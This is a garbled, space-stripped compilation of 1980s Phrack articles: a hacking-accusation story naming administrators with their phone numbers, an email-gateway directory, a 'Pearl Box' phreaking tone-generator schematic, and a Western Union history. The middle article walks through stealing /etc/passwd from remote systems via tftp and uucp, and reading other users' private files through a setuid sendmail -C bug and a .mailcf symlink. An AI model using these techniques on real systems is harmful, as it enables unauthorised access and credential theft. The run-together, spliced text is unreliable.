andaddressanddearuptheoccurrencecompletely.Wepointoutthattheuseris punishable.Incaseofrepetitionwewouldbeforcedtotakecorresponding measures.Wewillcheckwhetheroursystemgotinjured.Ifnot,thistimewe willdisregardanymeasure.InformusviaDECnetaboutyourinvestigation resultsweareattainablebythenodenumber1084::system Dipl.Ing.MichaelHager

Mysystemmanagerthreatenedmewiththedeletingofmyaccount,ifIwould notimmediatelyenlightentheaffair.*Gulp*!Iwasconsciousaboutmy innocence,buthowtotellittotheothers?Iexplained,stepbystep, everythingtomysystemmanager.Hethenunderstoodafterawhile,butthe criminalprocedurestillhoveredoverme...so,Itookquicklytomykeyboard, tocomposefileofexplanationsandtosendittothatangrysystemmanagerin Stuttgart(node1084isaninstitutethere).Butnowayout:Hehadrunoutof diskquotaandmyexplanationmailsailedintothenirwana: $mailexplanation To:1084::system %MAILE,errorsendingtouserSYSTEMat1084 %MAILEOPENOUT,erroropening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI; asoutput RMSECRE,ACPfilecreatefailed SYSTEMFEXDISKQUOTA,diskquotaexceeded AlsotheattemptofaconnectionwiththePHONEfacilityfailed:Inhis borderlesshackerparanoia,hecutoffhisPHONE...andnowhereisalistwith theREALaddressesofthevirtualDECnetaddressesavailable(toprevent hacking).NowIstoodtherewiththebrand"DANGEROUSHACKER!"andIhadno chancetovindicatemyself.Ipouredoutmytroublestoanacquaintanceofmine, whoisasysopinthecomputercenterinFreiburg.Heaskedothersysopsand managersthruthewholeBELWUEnetworkuntilsomeonegavehimatelephonenumber afterafewdaysandthatwastherightone! IphonedtothisHagerandtoldhimwhatIhaddonewithhisDECnetaccount andalsowhatNOT.IwantedtoknowwhichcrimeIhadcommitted.Hepromptly canceledallofhisreproaches,buthedidnotexcusehisdefames incriminations.IentreatedhimtoinformmysystemmanagerinTuebingenthatI havedonenothingillegalandtostophimfromerasingmyaccount.Thishappens alreadytoafellowstudentofmine(inthiscase,Hagerwasalsoguilty).He promisedmethathewouldofficiallycancelhisreproaches. Afteroveraweekthisdoesn'thappen(I'mallowedtousemyaccount furtheron).Inreturnforit,IreceivedanewmailfromHageronanother accountofmine: From:1084::HAGER1JUN198912:51 To:50180::STUD_11 Subj:Systembreakingin OnJune1st1989youhavecommittedasystembreakinginonatleastoneofour VAX's.Wewereabletoregisterthisoccurrence.Wewouldbeforcedtotake furthermeasureifyoudidnotdearuptheoccurrencecompletelyuntilJune6th. Ofcoursetheexpensesinvolvedwouldbeimposedonyou.Henceenlightenment mustbeinyourowninterest. WeareattainableviaDECnetmailwiththeaddress1084::HAGERorviafollowing address: InstitutfuerTechnischeThermodynamikundThermischeVerfahrenstechnik Dipl.Ing.M.HagerTel.:0711/6856109 Dipl.Ing.M.MrzyglodTel.:0711/6853398 Pfaffenwaldring9/101 7000Stuttgart80

M.Hager M.Mrzyglod Thiswasthereactionofmyattempt:"$PHONE1084::SYSTEM".Ihavenotanswered tothismail.IAMSICKOFIT! 124.PhrackMagazineVol.3,Issue28byTaranKing ACSNET AustralianComputerScienceNetwork(ACSNET),alsoknownasOz,hasitsgateway throughtheCSNETnodemunnari.oz.auandifyoucannotdirectlymailtothe oz.audomain,tryeitherusername%munnari.oz.au@UUNET.UU.NETormunnari! username@UUNET.UU.NET. AT&TMAIL AT&TMailisamailingserviceofAT&T,probablywhatyoumightcallit'sMCI Mailequivalent.ItisavailableontheUUCPnetworkasnodenameattmailbut I'vehadproblemshavingmailgetthrough.Apparently,itdoescostmoneyto mailtothisserviceandthesurroundingnodesarenotwillingtopickupthe tabfortheingoingmail,oratleast,thishasseeminglybeenthecasethus far.Ibelieve,though,thatperhapsroutingtoatt!attmail!userwouldwork. AT&TrecentlyannouncedsixnewX.400interconnectionsbetweenAT&TMailand electronicmailservicesintheUS,Korea,Sweden,Australia,andFinland.In theUS,AT&TMailisnowinterconnectedwithTelenetCommunications Corporation'sservice,Telemail,allowingusersofbothservicestoexchange messageseasily.Withtheadditionoftheseinterconnections,theAT&TMail Gateway400ServiceallowsAT&TMailsubscriberstoexchangemessageswithusers ofthefollowingelectronicmessagingsystems: Company EMailName Country TeleDelta TeDe400 Sweden OTC MPS400 Australia TelecomCanada Envoy100 Canada DACOM DACOMMHS Korea P&TTele MailNet400 Finland HelsinkiTelephoneCo. ELISA Finland Dialcom Dialcom USA Telenet Telemail USA KDD Messavia Japan Transpac ATLAS400 France TheinterconnectionsarebasedontheX.400standard,asetofguidelinesfor theformat,deliveryandreceiptofelectronicmessagesrecommendedbyan internationalstandardscommitteetheCCITT.InternationalX.400messagesincur asurcharge.Theyare: ToCanada: Pernote:$.05 Permessageunit:$.10 Tootherinternationallocations: Pernote:$.20 Permessageunit:$0 ThereisnosurchargeforX.400messageswithintheUSThefollowingare contactstospeakwithaboutmailingthroughthesementionednetworks.Other questionscanbedirectedthroughAT&TMail'stollfreenumber,18006245672.

MHSGateway:mhs!atlasMHSGateway:mhs!dacom Administrator:BernardTardieuAdministrator:BobNicholson TranspacAT&T Phone:3399283203Morristown,NJ07960 Phone:+12016441838 MHSGateway:mhs!dialcomMHSGateway:mhs!elisa Administrator:Mr.LaramanAdministrator:Ulla Karajalainen DialcomNokiaData SouthPlainfield,NJ07080Phone:01135804371 Phone:+14414933843 MHSGateway:mhs!envoyMHSGateway:mhs!kdd Administrator:KinC.MaAdministrator:ShigeoLwase TelecomCanadaKokusaiDenshinDenwaCO. Phone:+16135677584Phone:8133477419 MHSGateway:mhs!mailnetMHSGateway:mhs!otc Administrator:KariAakalaAdministrator:GaryW. Krumbine GenDirectorateOfPost&AT&TInformationSystems Phone:35806921730Lincroft,NJ07738 Phone:+12015762658 MHSGateway:mhs!telemailMHSGateway:mhs Administrator:JimKelsayAdministrator:AT&TMailMHS GTETelenetCommCorpGateway Reston,VA22096AT&T Phone:+17036896034Lincroft,NJ08838 Phone:+18006245672 CMR PreviouslyknownasIntermail,theCommercialMailRelay(CMR)Serviceisamail relayservicebetweentheInternetandthreecommercialelectronicmailsystems: USSprint/Telenet,MCIMail,andDIALCOMsystems(i.e.Compmail,NSFMAIL,and USDAMAIL). Animportantnote:Theonlyrequirementforusingthismailgatewayisthatthe workconductedmustbeDARPAsponsoredresearchandotherapprovedgovernment business.Basically,thismeansthatunlessyou'vegotsomegovernmentrelated business,you'renotsupposedtobeusingthisgateway.Regardless,itwouldbe verydifficultforthemtoscreeneverythingthatgoesthroughtheirgateway. BeforeIunderstoodtherequirementsofthisgateway,Iwassendingtoauserof MCIMailandwasnotcontactedaboutanyproblemswiththatcommunication. Unfortunately,ImistypedtheMCIMailaddressononeofthelettersandthat letterendedupgettingreadbysystemadministratorswhotheninformedmethat Iwasnottobeusingthatsystem,aswellasthefactthattheywouldliketo billmeforusingit.Thatwasaninterestingthoughtontheirpartanyway,but donotethatusingthisservicedoesincurcharges. TheCMRmailboxaddressineachsystemcorrespondstothelabel: Telemail:[Intermail/USCISI]TELEMAIL/USA MCIMail:Intermailor1078239 CompMail:IntermailorCMP0817 NSFMail:IntermailorNSF153 USDAMail:IntermailorAGS9999 Addressingexamplesforeachemailsystemareasfollows: MCIMAIL:

1234567sevendigitaddress EverettT.Bowensperson'sname(mustbeunique!) COMPMAIL: CMP0123threelettersfollowedbythreeorfourdigits S.Cooperinitial,then"."andthenlastname 134:CMP0123domain,then":"andthencombinationsystemand accountnumber NSFMAIL: NSF0123threelettersfollowedbythreeorfourdigits A.Phillipsinitial,then"."andthenlastname 157:NSF0123domain,then":"andthencombinationsystemand accountnumber USDAMAIL: AGS0123threelettersfollowedbythreeorfourdigits P.Shifterinitial,then"."andthenlastname 157:AGS0123domain,then":"andthencombinationsystemand accountnumber TELEMAIL: BARNOCuser(directlyonTelemail) BARNOC/LODHuser/organization(directlyonTelemail) [BARNOC/LODH]TELEMAIL/USA [user/organization]systembranch/country ThefollowingareotherTelenetsystembranches/countriesthatcanbemailedto: TELEMAIL/USANASAMAIL/USAMAIL/USATELEMEMO/AUSTRALIA TELECOM/CANADATOMMAIL/CHILETMAILUK/GBITALMAIL/ITALY ATI/JAPANPIPMAIL/ROCDGC/USAFAAMAIL/USA GSFC/USAGTEMAIL/USATM11/USATNET.TELEMAIL/USA USDA/USA Note:OMNET'sScienceNetisontheTelenetsystemMAIL/USAandtomailtoit, theformatwouldbe[A.MAILBOX/OMNET]MAIL/USA.Thefollowingareavailable subdivisionsofOMNET: AIRAtmosphericSciences EARTHSolidEarthSciences LIFELifeSciences OCEANOceanSciences POLARInterdisciplinaryPolarStudies SPACESpaceScienceandRemoteSensing ThefollowingisalistofDIALCOMsystemsavailableinthelistedcountries withtheirdomainandsystemnumbers: ServiceName Country DomainNumber SystemNumber KeylinkDialcom Australia 60 07,08,09 Dialcom Canada 20 20,21,22,23,24 DPTDatabooks Denmark 124 71 Telebox Finland 127 62 Telebox WestGermany 30 15,16 Dialcom HongKong 80 88,89 Eirmail Ireland 100 74 Goldnet Israel 50 05,06 Mastermail Italy 130 65,67 Mastermail Italy 1 66,68 Dialcom Japan 70 13,14 Dialcom Korea 1 52

TelecomGold Malta 100 75 Dialcom Mexico 1 52 Memocom Netherlands 124 27,28,29 Memocom Netherlands 1 55 Starnet NewZealand 64 01,02 Dialcom PuertoRico 58 25 Telebox Singapore 88 10,11,12 Dialcom Taiwan 1 52 TelecomGold UnitedKingdom 100 01,04,17,8089 DIALCOM USA 1 2934,37,38,4159,6163,9099 NOTE: Youcanalsomailtousername@NASAMAIL.NASA.GOVorusername@GSFCMAIL.NASA.GOV insteadofgoingthroughtheCMRgatewaytomailtoNASAMAILorGSFCMAIL. FormoreinformationandinstructionsonhowtouseCMR,sendamessagetothe usersupportgroupatintermailrequest@intermail.isi.edu(you'llgetbasically whatI'velistedplusmaybeabitmore).PleasereadChapter3ofTheFuture TranscendentSaga(LimbotoInfinity)forspecificsonmailingtothese destinationmailingsystems. COMPUSERVE CompuServeiswellknownforitsgamesandconferences.Itdoes,though,have mailingcapability.Now,theyhavedevelopedtheirownInternetdomain,called COMPUSERVE.COM.Itisrelativelynewandmailcanberoutedthrougheither TUT.CIS.OHIOSTATE.EDUorNORTHWESTERN.ARPA. Example:user%COMPUSERVE.COM@TUT.CIS.OHIOSTATE.EDUorreplaceTUT.CIS.OHIO STATE.EDUwithNORTHWESTERN.ARPA). TheCompuServelinkappearstobeapolledUUCPconnectionatthegateway machine.Itisactuallymanagedviaasetofshellscriptsandacommutility calledxcomm,whichoperatesviacommandscriptsbuiltontheflybytheshell scriptsduringanalysisofwhatjobsexisttogointoandoutofCompuServe. CompuServesubscriberaccountsoftheform7xxxx,yyyycanbeaddressedas 7xxxx.yyyy@compuserve.com.CompuServeemployeescanbeaddressedbytheir usernamesinthecsi.compuserve.comsubdomain.CISsubscriberswritemailto ">inet:user@host.domain"tomailtousersontheWideAreaNetworks,where ">gateway:"isCompuServe'sinternalgatewayaccesssyntax.Thegateway generatesfullyRFCcompliantheaders. TofullyextrapolatefromtheCompuServeside,youwouldusetheirEasyPlex mailsystemtosendmailtosomeoneinBITNETortheInternet.Forexample,to sendmemailatmyBitnetID,youwouldaddressitto: INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU OrtomyInternetID: INET:C488869@UMCVMB.MISSOURI.EDU Now,ifyouhaveaBITNETtoInternetuserid,thisisasillythingtodo,since yourconnecttimetoCompuServecostsyoumoney.However,youcanusethis informationtoletpeopleonCompuServecontactYOU.CompuServeCustomerService saysthatthereisnochargetoeitherreceiveorsendamessagetotheInternet orBITNET. DASNET DASnetisasmallernetworkthatconnectstotheWideAreaNetworksbutcharges fortheirservice.DASnetsubscribersgetchargedforbothmailtouserson othernetworksANDmailforthemfromusersofothernetworks.Thefollowingis

abriefdescriptionofDASnet,someofwhichwastakenfromtheirpromotional textletter. DASnetallowsyoutoexchangeelectronicmailwithpeopleonmorethan20 systemsandnetworksthatareinterconnectedwithDASnet.Oneofthedrawbacks, though,isthat,afterbeingsubscribedtotheseservices,youmustthen subscribetoDASnet,whichisaseparatecost.MembersofWideAreanetworkscan subscribetoDASnettoo.Someofthenetworksandsystemsreachablethrough DASnetincludethefollowing: ABA/net,ATTMail,BIX(ByteInformationeXchange),DASnetNetwork,Dialcom, EIES,EasyLink,Envoy100,FAX,GeoMail,INET,MCIMail,NWI,PeaceNet/EcoNet, PortalCommunications,TheMetaNetwork,TheSource,Telemail,ATI'sTelemail (Japan),Telex,TWICS(Japan),UNISON,UUCP,TheWELL,andDomains(i.e.".COM" and".EDU"etc.).Newsystemsareaddedallofthetime.Asofthewritingof thisfile,Connect,GoverNET,MacNET,andTheAmericanInstituteofPhysicsPI MAILaresoontobeconnected. YoucangetvariousaccountsonDASnetincluding: CorporateAccountsIfyourorganizationwantsmorethanoneindividual subscription. SiteSubscriptionsIfyouwantDASnettolinkdirectlytoyour organization'selectronicmailsystem. TosendemailthroughDASnet,yousendthemessagetotheDASnetaccounton yourhomesystem.Youreceiveemailatyourmailbox,asyoudonow.Onthe WideAreaNetworks,yousendmailtoXB.DAS@STANFORD.BITNET.OntheSubject: line,youtypetheDASnetaddressinbracketsandthentheusernamejustoutside ofthem.Therealsubjectcanbeexpressedaftertheusernameseparatedbya"!" (Example:Subject:[0756TK]randy!How'sPhrack?). TheonlydisadvantageofusingDASnetasopposedtoWideAreanetworksisthe cost.Subscriptioncostsasof3/3/89cost$4.75permonthor$5.75permonth forhoststhatareoutsideoftheUSA Youarealsochargedforeachmessagethatyousend.Ifyouarecorresponding withsomeonewhoisnotaDASnetsubscriber,THEIRMAILTOYOUisbilledtoyour account. Thefollowingisanabbreviatedcostlistformailingtothedifferentservices ofDASnet: PARTIALListDASnetCostDASnetCost ofServices1st1000EachAdditional1000 LinkedbyDASnet(email)CharactersCharacters: INET,MacNET,PeaceNet,NOTE:20lines Unison,UUCP*,Domains,.21.11oftextisapp. e.g..COM,.EDU*1000characters. DialcomAny"host"inUS.36.25 DialcomHostsoutsideUS.93.83 EasyLink(FromEasyLink).21.11 (ToEasyLink)5.23 USFAX(internationalavail.).79.37 GeoMailAny"host"inUS.21.11 GeoMailHostsoutsideUS.74.63

MCI(fromMCI).21.11 (toMCI).78.25 (PapermailUSA)2.31.21 Telemail.36.25 W.U.TelexUnitedStates1.791.63 (YoucanalsosendTelexesoutsidetheUS) TWICSJapan.89.47 *Thechargesgivenherearetothegatewaytothenetwork.TheDASnetuser isnotchargedfortransmissiononthenetworkitself. SubscriberstoDASnetgetafreeDASnetNetworkDirectoryaswellasalisting inthedirectory,andtheabilitytoorderoptionalDASnetserviceslikeauto portingorDASnetTelexServicewhichgivesyouyourownTelexnumberand answerbackfor$8.40amonthatthistime. DASnetisaregisteredtrademarkofDASystems,Inc. DASystems,Inc. 1503E.CampbellAve. Campbell,CA95008 4085597434 TELEX:9103803530 ThefollowingtwosectionsonPeaceNetandAppleLinkareinassociationwith DASnetasthisnetworkiswhatisusedtoconnect. 125.PhrackMagazineVol.3,Issue28byDispater Introduction: AfterreadingtheearlierrenditionsofschematicsforthePearlBox,Idecided thattherewasaneasierandcheaperwayofdoingthesamethingwithanICand partsyouprobablyhavejustlayingaroundthehouse. WhatIsAPearlBoxandWhyDoIWantOne? APearlBoxisatonegeneratingdevicethatisusedtomakeawiderangeof singletones.Therefore,itwouldbeveryeasytomodifythisbasicdesignto makeaBlueBoxbymaking2PearlBoxesandjoiningthemtogetherinsome fashion. APearlBoxcanbeusedtocreateanytoneyouwishthatotherboxesmaynot. Italsohasatonesweepoptionthatcanbeusedfornumerousthingslike detectingdifferenttypesofphonetappingdevices. PartsList: CD4049RCAintegratedcircuit .1uFdiskcapacitor 1uF16Velectroliticcapacitor 1Kresistor 10Mresistor 1Megpot 1N914diode SomeSPSTmomentarypushbuttonswitches 1SPDTtoggleswitch 9Voltbattery&clipandmiscellaneousstuffyoushouldhavelaying aroundthehouse.

StateoftheArtTextSchematic: +16V1uF _______________________________||_____ |!!|||_ |_______________________|__________||/|8ohms ____|__|_____:__|__:__|_|__________||| |910111213141516||||_|\| |CD4049UBE||| |_1__2__3__4__5__6__7__8_|:|_ |||__||__|||____________________|_________[] ||!!:[b] ||__________________________|[a] |::|[t] |!1N914!![t] |___________|/|_____________________________________[+] :|\|:: ||| |10M|| |___/\/\/\__|| ||| |_____||____||<These2wirestothecenterpole ||||ofswitch. .1uF50V|| || _______________________||_____________________________ |___[ToggleSwitch]____________| |||___| |||oo| |||/\/\/\___||__| |_/\/\/\____/\/\/\||^| 1K^||____|___| |___||oo| |/\/\/\___||__| 126.PhrackMagazineVol.3,Issue28byDarkOverLord Therearemanywaysofgettingcopiesoffilesfromaremotesystemthatyoudo nothavepermissiontoreadoranaccountonloginontoandaccessthem through.Manyadministratorsdonotevenbothertorestrictmanyaccesspoints thatyoucanuse. Herearethesimplestways: 1. Useuucp(1)[TrivialFileTransferProtocol]toretrieveacopyofafile ifyouarerunningonanInternetbasednetwork. 2. Abuseuucp(1)[UnixtoUnixCopyProgram]toretrieveacopyofafileif uucpconnectionsarerunningonthatsystem. 3. Accessoneofmanyknownsecurityloopholes.

Inthefollowingexamples,wewillusethepasswdfileasthefiletoacquire sinceitisareadablefilethatcanbefoundonmostsystemsthattheseattacks arevalidon. MethodA: 1. Firststartthetftpprogram:

Enterthecommand: tftp [Youhavethefollowingprompt:] tftp> 2. Thenextstepistoconnecttothesystemthatyouwishtoretrievefiles from.Atthetftp,type: tftp>connectother.system.com 3. Nowrequestthefileyouwishtogetacopyof(inourcase,thepasswd file/etc/passwd): tftp>get/etc/passwd/tmp/passwd [Youshouldseesomethingthatlookslikethefollowing:] Received185659bytesin22seconds. 4. Nowexitthetftpprogramwiththe"quit"command: tftp>quit Youshouldnowhaveacopyofother.system.com'spasswdfileinyourdirectory. NOTE:SomeUnixsystems'tftpprogramshaveadifferentsyntax.Theabovewas testedunderSunOS4.0 Forexample,onApollos,thesyntaxis: tftp{g|g!|p|r|w}[netascii|image] Thusyoumustusethecommand: tftpgpassword_filenetworkedhost/etc/passwd Consultyourlocal"man"pagesformoreinfo(orinotherwordsRTFM). Attheendofthisarticle,Iwillincludeashellscriptthatwillsnarfa passwordfilefromaremotehost.Touseittype: gpwsystem_name MethodB: Assumingwearegettingthefile/etc/passwdfromthesystemuusucker,andour systemhasadirectuucpconnectiontothatsystem,itispossibletorequesta copyofthefilethroughtheuucplinks.Thefollowingcommandwillrequest thatacopyofthepasswdfilebecopiedintouucp'shomedirectory /usr/spool/uucppublic: uucpmuusucker!/etc/passwd'>uucp/uusucker_passwd' Theflag"m"meansyouwillbenotifiedbymailwhenthetransferiscompleted. MethodC:

Thethirdpossiblewaytoaccessthedesiredfilerequiresthatyouhavethe loginpermissiontothesystem. InthiscasewewillutilizeawellknownbuginUnix'ssendmaildaemon. Thesendmailprogramhasandoption"C"inwhichyoucanspecifythe configurationfiletouse(bydefaultthisfileis/usr/lib/sendmail.cfor /etc/sendmail.cf).Itshouldalsobenotedthatthediagnosticsoutputtedby sendmailcontaintheoffendinglinesoftext.Alsonotethatthesendmail programrunssetuidroot. Thewayyoucanabusethissetoffacts(ifyouhavenotyetguessed)isby specifyingthefileyouwishreadastheconfigurationfile.Thusthecommand: sendmailC/usr/accounts/random_joe/private/file Willgiveyouacopyofrandomjoe'sprivatefile. Anothersimilartrickistosymlinkyour.mailcffiletojoe'sfileandmail someone.Whenmailexecutessendmail(tosendthemail),itwillloadinyour mailcfandbarfoutjoe'sstuff. First,linkjoe'sfiletoyour.mailcf. lns/usr/accounts/random_joe/private/file$HOME/.mailcf Next,sendmailtosomeone. mailC488869@umcvmb.missouri.edu 127.PhrackMagazineVol.3,Issue30byPhonePhanatic "Untilafewyearsagomaybetenitwasverycommonto seeTWXandTelexmachinesinalmosteverybusinessplace." TherewereonlyminordifferencesbetweenTelexandTWX.Thebiggestdifference wasthattheformerwasalwaysrunbyWesternUnion,whilethelatterwasrunby theBellSystemforanumberofyears.TWXliterallymeant"(T)ype(W)riter e(x)change,"anditwasBell'sanswertocompetitionfromWesternUnion.There were"threerow"and"fourrow"machines,meaningthenumberofkeysonthe keyboardandhowtheywerelaidout.The"threerow"machinesweresimplypart oftheregularphonenetwork;thatis,theycoulddialoutandtalktoanother TWXalsoconnectedonregularphonelines. Eventuallythesewerephasedoutinfavorof"newerandmoreimproved"machines withadditionalkeys,aswellasapapertapereaderattachmentwhichallowed sendingthesamemessagerepeatedlytomanydifferentmachines.These"fourrow" machineswerenotontheregularphonenetwork,butwereassignedtheirownarea codes(410510610710810910)wheretheystillremaintoday.Theonlywaya fourrowmachinecouldcallathreerowmachineorviceversawasthrougha gatewayofsortswhichtranslatedsomeofthecharactersetuniquetoeach machine. WesternUnion'snetworkwascalledTelexandinadditiontobeingableto contact(bydialup)othersimilarmachines,TelexcouldconnectwithTWX(and viceversa)aswellasalltheWesternUnionpublicofficesaroundthecountry. Untilthelate1950'sorearly1960's,everysmalltowninAmericahadaWestern Unionoffice.BigcitieslikeChicagohadperhapsadozenofthem,andthey usedmessengerstohanddelivertelegramsaroundtown.Telegramscouldbeplaced inpersonatanypublicoffice,orcouldbecalledintothenearestpublic office.

Byarrangementwithmosttelcos,theWesternUnionofficeintownnearlyalways hadthephonenumber4321,latersupplementedinautomatedexchangeswithsome prefixXXX4321.Telegramscouldbechargedtoyourhomephonebill(thisis stillthecaseinsomecommunities)andfromacoinphone,onedidnotaskfor 4321,butrather,calledtheoperatorandaskedforWesternUnion.Thiswas necessarysinceoncethetelegramhadbeengivenverballytothewireclerk, s/heinturnhadtoflashthehookandgetyouroperatorbackonthelineto tellthem"collectfivedollarsandtwentycents"orwhateverthecostwas. Telegrams,likephonecalls,couldbesentcollectorbilledthirdparty.Ifyou hadanaccountwithWesternUnion,i.e.aTelexmachineinyouroffice,you couldchargethecallsthere,butmostlikelyyouwouldsimplysendthetelegram fromthereinthefirstplace. Sometimeintheearly1960's,WesternUnionfiledsuitagainstAT&Taskingthat theyturnovertheirTWXbusinesstothem.Theycitedanearliercourtruling, circa1950's,whichsaidAT&Twasprohibitedfromacquiringanymoretelephone operatingcompaniesexceptundercertainconditions.TheSupremeCourtagreed withWesternUnionthat"spokenmessages"werethedomainofMaBell,but "writtenmessages"werethedomainofWesternUnion.SoBellwasrequiredto divestitselfoftheTWXnetwork,andWesternUnionhasoperateditsince, althoughafewyearsagotheybeganphasingoutthephrase"TWX"infavorof "TelexII";theiroriginaldevicebeing"TelexI"ofcourse.TWXstillusesten digitdialingwith610(Canada)or710/910(USA)beingtheleadingthreedigits. Apparently410510havebeenabandoned;oratleasttheyareusedverylittle, andBellcorehasassigned510totheSanFranciscoareastartinginayearor so.410stillhassomefunnythingsonit,liketheWesternUnion"Infomaster," whichisacomputerthatfunctionslikeagatewaybetweenTelex,TWX,EasyLink andsomeotherstuff. Today,theWesternUnionnetworkisbutaskeletonofitsformerself.Nowmost oftheirmessagesarehandledondialupterminalsconnectedtothepublicphone network.IthasbeenestimatedtheTWX/Telexbusinessisaboutfiftypercentof whatitwasadecadeago,ifthatmuch. ThentherewastheTimeService,aneatthingwhichWesternUnionofferedfor overseventyyears,untilitwasdiscontinuedinthemiddle1960's.TheTime Serviceprovidedanimportantfunctioninthedaysbeforealternatingcurrent wascommonlyavailable.Forexample,Chicagodidn'thaveACelectricityuntil about1945.PriortothatweusedDC,ordirectcurrent. Well,torunanelectricclock,youneed60cyclesACcurrentforobvious reasons,sopriortotheconversionfromDCpowertoACpower,electricwall clockssuchasyouseeineveryofficewereunheardof.Howwerepeopletotell thetimeofdayaccurately?EntertheWesternUnionclock. TheWesternUnion,or"telegraphclock"wasaspringdrivenwindupclock,but withadifference.Theclockswere"perpetuallyselfwinding,"manufacturedby theSelfWindingClockCompanyofNewYorkCity.Theyhadlargebatteriesinside them,knownas"telephonecells"whichhadalifeofabouttenyearseach.A mechanicalcontrivanceintheclockwouldrotateastheclockspringunwound, andonceeachhourwouldcausetwometalclipstocontactforabouttenseconds, whichwouldpassjuicetothelittlemotorintheclockwhichinturnrewound themainspring.Theprinciplewasthesameasthebatteryoperatedclockswe seetoday.Thebatterydoesnotactuallyruntheclockdirectcurrentcan't dothatbutitdoespowerthetinymotorwhichrewindsthespringwhich actuallydrivestheclock. TheWesternUnionclockscameinvarioussizesandshapes,rangingfromthe smallestdialswhichwerenineinchesindiametertothelargestwhichwere abouteighteeninchesindiameter.Somehadsweepsecondhands;othersdidnot. Somehadalittleredlightbulbonthefrontwhichwouldflash.Thetypical

modelwasaboutsixteeninches,andwasfoundinoffices,schools, transportationdepots,radiostationoffices,andofcourseinthetelegraph officeitself. Theonethingalltheclockshadincommonwastheirbrownmetalcaseandcream coloredface,withtheinsignia"WesternUnion"andtheircorporatelogoin thosedayswhichwasaboltofelectricity,sortoflikealetter"Z"layingon itsside.Andinsomewhatsmallerprintbelow,thewords"NavalObservatory Time." Thelocalclocksinanofficeorschoolorwhereverwerecalibratedbya"master clock"(actuallyasubmaster)onthepremises.Onceanhouronthehour,the (sub)masterclockwoulddropametalcontactforjustahalfsecond,andsend aboutninevoltsDCupthelinetoallthelocalclocks.Theyinturnhada "tolerance"ofabouttwominutesonbothsidesofthehoursothatthecurrent comingtothemwouldyanktheminutehandexactlyuprightontothetwelvefrom eitherdirectioniftheclockwasfastorslow. Thesubmasterclocksineachbuildingwereinturnservicedbythemasterclock intown;usuallythiswastheoneinthetelegraphoffice.Everyhouronthe halfhour,themasterclockinthetelegraphofficewouldthrowcurrenttothe submasters,yankingthemintosynchasrequired.Andasforthetelegraph officesthemselves,theywereservicedtwiceadaybyyouguesseditthe NavalObservatoryMasterclockinOurNation'sCapitol,bythesameroutine. Someonetherewouldpresshalfadozenbuttonsatthesametime,usingall availablefingers;currentwouldflowtoeverytelegraphofficeandsynchall themasterclocksineverycommunity.WesternUnionchargedfiftycentsper monthfortheservice,andtossedtheclockinforfree!Ohyes,therewasan installationchargeofabouttwodollarswhenyoufirsthadservice(i.e.a clock)installed. Theclockswereinstalledandmaintainedbythe"clockman,"atechnicianfrom WesternUnionwhospenthisdaygoingaroundhangingnewclocks,takingthemout ofservice,changingbatterieseveryfewyearsforeachclock,etc. Whatapanicitwasforthemwhen"wartime"(whatwenowcallDaylightSavings Time)camearoundeachyear!Wally,theguywhoservicedalltheclocksin downtownChicagohadtostarton*Thursday*beforetheSundayofficial changeoverjusttofinishthemallby*Tuesday*following.Hewouldliterally rushinanoffice,usehisscrewdrivertoopenthecase,twirlthehourhand aroundonehourforwardinthespring,(orelevenhours*forward*inthefall sincethehandscouldnotbemovedbackwardbeyondthetwelvegoing counterclockwise),slamthecasebackon,screwitin,andmovedownthehallto thenextclockandrepeattheprocess.Hecouldfinishseveraldozenclocksper day,andusuallytheofficeassignedhimahelpertwiceayearfortheseevents. Hesaidtheyneverbotheredtolinetheminutehandupjustright,becauseit wouldhavetakentoolong,and".....anyway,aslongaswegotitwithina minuteorso,itwouldsynchitselfthenexttimethemasterclocksenta signal..."Workingfast,ittookaminutetoaminuteandahalftoopenthe case,twirltheminutehand,putthecasebackon,"stopandBSwiththe receptionistforacoupleseconds"andmovealong. Themasterclocksentitssignaloverregulartelcophonelines.Usuallyit wouldterminateinthemainofficeofwhateverplaceitwas,andthe(sub) mastertherewouldtakeoveratthatpoint. Wallysaiditwasveryimportanttodoaprofessionaljobofhangingtheclock tobeginwith.Ithadtobelevel,andthependulumhadtobejustright, otherwisetheclockwouldgainorlosemoretimethancouldbeaccommodatedin thehourlysynchingprocess.Hesaiditwasaveryrareclockthatactuallywas

outbyevenaminuteonceanhour,letalonethetwominutesoftolerancebuilt intothegearworks. "...SometimesIwouldcometoworkonMondaymorning,andfindoutintheoffice thattheclocklinehadgoneopenFridayevening.Sonobodyallweekendgota signal.UsuallyIwouldgodownamanholeandfinditopensomeplacewhereone oftheBellguysmesseditup,ortookitoffandneverputitbackon.Tofind outwhereitwasopen,someoneintheofficewould'ringout'theline;I'dgo arounddowntownfollowingtheloopaswehaditlaidout,andkeeplisteningon myheadsetforit.WhenIfoundthebreakortheopen,Iwouldtieitdownagain andtheofficewouldreleasetheline;butthenIhadtogotoalltheclocks *before*thatpointandrestartthem,sincetheconstantcurrentfromtheoffice duringthesearchhadusuallycausedthemtostop." Buthesaid,timeandagain,theclockswereusuallysowellmountedandhung that"...itwasrarewewouldfindonesofaroutofsynchthatwehadtoadjust itmanually.UsuallythefirstsignaltomakeitthroughonceIrepairedthe circuitwouldyankeveryoneintowntomakeupforwhatevertheylostorgained overtheweekend..." In1965,WesternUniondecidedtodiscontinuetheTimeService.Inanostalgic lettertosubscribers,theyannouncedtheirdecisiontosuspendoperationsat theendofthecurrentmonth,butsaid"foroldtime'ssake"anyonewhohada clockwaswelcometokeepitandcontinueusingit;therejustwouldnotbeany settingsignalsfromthemasterclocksanylonger. Withinadayortwooftheofficialannouncement,everyWesternUnionclockin theChicagoareaheadquartersbuildingwasgone.Theexecutivessnatchedthem offthewall,andtookthemhomeforthedaywhentheywouldhavehistorical value.Alltheclocksinthetelegraphofficesdisappearedaboutthesametime, tobereplacedwithstandardofficestyleelectricwallclocks. 128.PhrackMagazineVol.3,Issue30bySynthecide Thereareliterallyhundredsofsystemsconnectedtosomeoftheselarger networks,likeTymnetandTelenet.Navigationaroundthesenetworksisvery simple,andusuallywellexplainedintheironlinedocumentation.Furthermore, somesystemswillactuallytellyouwhatisconnectedandhowtogettoit.In thecaseofTymnet,afterdialingin,attheloginprompt,type"information" fortheonlinedocumentation. Accessingsystemsthroughnetworksisassimpleasprovidinganaddressforit toconnectto.Thebestwaytolearnabouttheaddressesandhowtodothingson anetworkistoread"ANovice'sGuidetoHacking(1989Edition)"whichwasin Issue22,File4of12,VolumeTwo(December23,1988).Somepointsare reiteratedhere. 